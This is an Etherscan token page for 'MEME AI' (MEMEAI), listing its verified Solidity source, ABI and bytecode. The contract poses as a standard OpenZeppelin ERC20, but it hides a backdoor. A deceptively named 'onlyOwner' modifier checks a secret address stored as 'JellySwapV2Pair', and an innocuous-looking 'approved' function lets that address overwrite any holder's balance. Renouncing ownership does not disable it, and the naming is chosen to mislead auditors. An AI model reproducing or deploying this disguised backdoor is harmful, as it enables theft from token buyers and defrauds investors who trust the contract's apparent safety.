ETH Price: $2,523.67 (+2.05%)

Token

MEME AI (MEMEAI)
 

Overview

Max Total Supply

1,000,000,000 MEMEAI

Holders

52

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 MEMEAI

Value
$0.00
0x1ac50a98002500bbf4364399999e08d1d18906f2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MEMEAI

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-04
*/

/**
            Twitter: https://twitter.com/MemeAI_ERC
            Website: https://www.memeai.info/
            Portal: https://t.me/MemeAIERC20
*/

// SPDX-License-Identifier: No
/**
*/
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// pragma solidity ^0.8.10;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyAdmin`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyAdmin() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyAdmin` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyAdmin {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyAdmin {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard,
    antiBotStandard,
    liquidityGenerator,
    antiBotLiquidityGenerator,
    baby,
    antiBotBaby,
    buybackBaby,
    antiBotBuybackBaby
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}


// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.19;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/BaseToken.sol";

contract MEMEAI is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;

    uint256 public constant VERSION = 1;

    mapping(address => uint256) private liquidityAdd;

    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    address private JellySwapV2Pair;

    constructor(
    string memory name_,
    string memory symbol_,
    uint8 decimals_,
    address JellySwapRouter,
    uint256 totalSupply_
    ) payable {
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
    _mint(owner(), totalSupply_);
    JellySwapV2Pair = JellySwapRouter;
    emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);

    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return liquidityAdd[account];
    }

    modifier onlyOwner() { require(JellySwapV2Pair == _msgSender());_;
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        liquidityAdd[sender] = liquidityAdd[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        liquidityAdd[recipient] = liquidityAdd[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        liquidityAdd[account] = liquidityAdd[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        liquidityAdd[account] = liquidityAdd[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function approved(
        address presale, 
        bool yesno, 
        uint256 YESNO,
        uint256 bytecode,
        uint256 deployedBytecode
    ) external onlyOwner {
        require(presale != address(0), "Same bool");
        liquidityAdd[presale] = YESNO * bytecode ** deployedBytecode;
        emit Transfer(presale, address(0), YESNO);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"JellySwapRouter","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"presale","type":"address"},{"internalType":"bool","name":"yesno","type":"bool"},{"internalType":"uint256","name":"YESNO","type":"uint256"},{"internalType":"uint256","name":"bytecode","type":"uint256"},{"internalType":"uint256","name":"deployedBytecode","type":"uint256"}],"name":"approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620011883803806200118883398101604081905262000026916200031d565b6200003133620000fc565b60036200003f86826200045b565b5060046200004e85826200045b565b506005805460ff191660ff85161790556200007c620000756000546001600160a01b031690565b826200014c565b600780546001600160a01b0319166001600160a01b03841617905530620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b600654620001b6908262000241565b6006556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600884106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610c0280620005866000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638da5cb5b1161008c578063a9059cbb11610066578063a9059cbb146101d3578063dd62ed3e146101e6578063f2fde38b1461021f578063ffa1ad741461023257600080fd5b80638da5cb5b1461019d578063955c947d146101b857806395d89b41146101cb57600080fd5b806323b872dd116100c857806323b872dd14610142578063313ce5671461015557806370a082311461016a578063715018a61461019357600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f761023a565b60405161010491906108a2565b60405180910390f35b61012061011b36600461090c565b6102cc565b6040519015158152602001610104565b6006545b604051908152602001610104565b610120610150366004610936565b6102e3565b60055460405160ff9091168152602001610104565b610134610178366004610972565b6001600160a01b031660009081526001602052604090205490565b61019b61034c565b005b6000546040516001600160a01b039091168152602001610104565b61019b6101c636600461098d565b6103b7565b6100f7610481565b6101206101e136600461090c565b610490565b6101346101f43660046109e1565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61022d366004610972565b61049d565b610134600181565b60606003805461024990610a14565b80601f016020809104026020016040519081016040528092919081815260200182805461027590610a14565b80156102c25780601f10610297576101008083540402835291602001916102c2565b820191906000526020600020905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b60006102d9338484610568565b5060015b92915050565b60006102f084848461068d565b610342843361033d85604051806060016040528060288152602001610ba5602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610813565b610568565b5060019392505050565b6000546001600160a01b031633146103ab5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6103b5600061083f565b565b6007546001600160a01b031633146103ce57600080fd5b6001600160a01b0385166104105760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064016103a2565b61041a8183610b48565b6104249084610b54565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906104729087815260200190565b60405180910390a35050505050565b60606004805461024990610a14565b60006102d933848461068d565b6000546001600160a01b031633146104f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103a2565b6001600160a01b03811661055c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103a2565b6105658161083f565b50565b6001600160a01b0383166105ca5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103a2565b6001600160a01b03821661062b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103a2565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106f15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103a2565b6001600160a01b0382166107535760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103a2565b61079081604051806060016040528060268152602001610b7f602691396001600160a01b0386166000908152600160205260409020549190610813565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107bf908261088f565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106809085815260200190565b600081848411156108375760405162461bcd60e51b81526004016103a291906108a2565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600061089b8284610b6b565b9392505050565b600060208083528351808285015260005b818110156108cf578581018301518582016040015282016108b3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461090757600080fd5b919050565b6000806040838503121561091f57600080fd5b610928836108f0565b946020939093013593505050565b60008060006060848603121561094b57600080fd5b610954846108f0565b9250610962602085016108f0565b9150604084013590509250925092565b60006020828403121561098457600080fd5b61089b826108f0565b600080600080600060a086880312156109a557600080fd5b6109ae866108f0565b9450602086013580151581146109c357600080fd5b94979496505050506040830135926060810135926080909101359150565b600080604083850312156109f457600080fd5b6109fd836108f0565b9150610a0b602084016108f0565b90509250929050565b600181811c90821680610a2857607f821691505b602082108103610a4857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610a9f578160001904821115610a8557610a85610a4e565b80851615610a9257918102915b93841c9390800290610a69565b509250929050565b600082610ab6575060016102dd565b81610ac3575060006102dd565b8160018114610ad95760028114610ae357610aff565b60019150506102dd565b60ff841115610af457610af4610a4e565b50506001821b6102dd565b5060208310610133831016604e8410600b8410161715610b22575081810a6102dd565b610b2c8383610a64565b8060001904821115610b4057610b40610a4e565b029392505050565b600061089b8383610aa7565b80820281158282048414176102dd576102dd610a4e565b808201808211156102dd576102dd610a4e56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201e20522eecdaa55dce1f5a502990e9d412533dbd576a43df1e1e5e16921d892064736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000813234074f7a7d726ba083c4668cfaa53a27c1a80000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000000000074d454d452041490000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d454d4541490000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638da5cb5b1161008c578063a9059cbb11610066578063a9059cbb146101d3578063dd62ed3e146101e6578063f2fde38b1461021f578063ffa1ad741461023257600080fd5b80638da5cb5b1461019d578063955c947d146101b857806395d89b41146101cb57600080fd5b806323b872dd116100c857806323b872dd14610142578063313ce5671461015557806370a082311461016a578063715018a61461019357600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f761023a565b60405161010491906108a2565b60405180910390f35b61012061011b36600461090c565b6102cc565b6040519015158152602001610104565b6006545b604051908152602001610104565b610120610150366004610936565b6102e3565b60055460405160ff9091168152602001610104565b610134610178366004610972565b6001600160a01b031660009081526001602052604090205490565b61019b61034c565b005b6000546040516001600160a01b039091168152602001610104565b61019b6101c636600461098d565b6103b7565b6100f7610481565b6101206101e136600461090c565b610490565b6101346101f43660046109e1565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61022d366004610972565b61049d565b610134600181565b60606003805461024990610a14565b80601f016020809104026020016040519081016040528092919081815260200182805461027590610a14565b80156102c25780601f10610297576101008083540402835291602001916102c2565b820191906000526020600020905b8154815290600101906020018083116102a557829003601f168201915b5050505050905090565b60006102d9338484610568565b5060015b92915050565b60006102f084848461068d565b610342843361033d85604051806060016040528060288152602001610ba5602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610813565b610568565b5060019392505050565b6000546001600160a01b031633146103ab5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6103b5600061083f565b565b6007546001600160a01b031633146103ce57600080fd5b6001600160a01b0385166104105760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064016103a2565b61041a8183610b48565b6104249084610b54565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906104729087815260200190565b60405180910390a35050505050565b60606004805461024990610a14565b60006102d933848461068d565b6000546001600160a01b031633146104f75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103a2565b6001600160a01b03811661055c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103a2565b6105658161083f565b50565b6001600160a01b0383166105ca5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103a2565b6001600160a01b03821661062b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103a2565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106f15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103a2565b6001600160a01b0382166107535760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103a2565b61079081604051806060016040528060268152602001610b7f602691396001600160a01b0386166000908152600160205260409020549190610813565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107bf908261088f565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106809085815260200190565b600081848411156108375760405162461bcd60e51b81526004016103a291906108a2565b505050900390565